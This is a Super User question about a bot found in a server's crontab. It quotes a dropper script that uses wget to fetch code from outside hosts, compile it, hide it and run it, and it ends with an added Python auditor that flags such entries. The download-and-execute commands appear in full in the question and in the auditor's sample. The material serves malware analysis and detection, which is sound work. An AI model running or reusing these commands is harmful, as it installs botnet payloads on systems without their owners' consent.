Is SecureShellz bot a virus? How does it work?
Posted by ProGNOMmers on Super User
Published on 2012-07-06T09:08:55Z
I'm using a development server in which I found this in the crontab:
[...]
* * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
[...]
The contents of http://stablehost.us/bots/regular.bot are:
#!/bin/sh
if [ $(whoami) = "root" ]; then
echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make
echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make
pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c
wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1
wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2
exit 1
fi
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php
wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa
wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_
I cannot contact the sysadmin for various reasons, so I cannot ask him for information about this.
It seems to me this script downloads some remote C source code and binaries, compiles them and executes them.
I am a web developer, so I am not an expert in the C language, but looking at the downloaded files it seems to me a bot injected into the cron of the server.
Can you give me more information about what this code does? About how it works and its purposes?
© Super User or respective owner
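The two crontab entries in the question show the pattern a defender wants to catch: a job that fetches a file with wget, marks it executable and runs it, and a job that runs a hidden file out of /dev/shm every minute. The following crontab audit is an added example, not code from the question or from any Super User answer; the heuristics (scratch directories, dot-prefixed executables, a download target that is executed later in the same entry, wget/curl followed by chmod +x) are my own choices, and the sample crontab is constructed from the two entries quoted in the question plus ordinary jobs I made up for contrast.

```python
"""Audit crontab entries for download-and-execute and hidden-binary patterns (added example)."""
import os
import re
from dataclasses import dataclass

# Locations from which a legitimate cron job rarely runs a binary: tmpfs and world-writable scratch space.
SCRATCH_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/")
# "wget ... -O <file>" or "curl ... -o <file>": captures the file the downloader writes.
DOWNLOAD_TARGET = re.compile(r"\b(?:wget|curl)\b[^;|&]*?\s-[oO]\s*([^\s;|&]+)")
# Shell command separators: ; | || & &&
SEPARATOR = re.compile(r"[;|&]+")
# Redirections such as >/dev/null, 2>&1, >>log or <input; they are not commands and are dropped.
REDIRECT = re.compile(r"\d*>&\d+|\d*>>?\s*[^\s;|&]+|<\s*[^\s;|&]+")


@dataclass
class Finding:
    line_no: int
    entry: str
    reasons: list


def entry_command(line):
    """Return the command part of one crontab line, or None for blank, comment and VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if s.startswith("@"):                 # @reboot, @daily, @weekly, ...
        parts = s.split(None, 1)
    else:
        fields = s.split(None, 5)         # minute hour dom month dow command
        if len(fields) < 6:
            return None                   # an environment assignment or a malformed line
        parts = [" ".join(fields[:5]), fields[5]]
    return parts[1] if len(parts) == 2 else None


def command_heads(command):
    """The program invoked by each simple command in a ;, |, & chain, ignoring redirections."""
    heads = []
    for segment in SEPARATOR.split(REDIRECT.sub(" ", command)):
        words = segment.split()
        if words:
            heads.append(words[0])
    return heads


def suspicious_reasons(command):
    """Heuristic signals that an entry fetches code and runs it, or runs a hidden file from scratch space."""
    reasons = []
    heads = command_heads(command)
    for head in heads:
        if head.startswith(SCRATCH_DIRS):
            reasons.append(f"runs {head} from a scratch directory")
        base = os.path.basename(head)
        if base.startswith(".") and base not in (".", ".."):
            reasons.append(f"runs hidden file {head}")
    for target in DOWNLOAD_TARGET.findall(command):
        # The downloaded file is itself invoked later in the same entry (directly or as ./file).
        if target in heads or "./" + target in heads:
            reasons.append(f"downloads {target} and then executes it")
    if re.search(r"\b(?:wget|curl)\b", command) and re.search(r"chmod\s+\+x", command):
        reasons.append("downloads a file and marks it executable")
    return reasons


def audit_crontab(text):
    """Return a Finding for every entry that triggers at least one heuristic."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        command = entry_command(line)
        if command is None:
            continue
        reasons = suspicious_reasons(command)
        if reasons:
            findings.append(Finding(line_no, line.strip(), reasons))
    return findings


# Constructed sample: the two entries quoted in the question plus ordinary jobs for contrast.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
@daily /usr/bin/certbot renew --quiet
* * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
*/5 * * * * cd /var/www && php artisan schedule:run
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.entry}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run against the sample, only the two entries from the question are reported: the per-minute job for running a hidden file from /dev/shm, and the weekly job for that plus fetching the file, marking it executable and running it. The same audit can be fed the output of `crontab -l` for each user and the contents of /etc/cron.d, /etc/crontab and the system cron directories; the heuristics are signals to review, not proof, so a hit is a prompt to look at the file and at who wrote the entry.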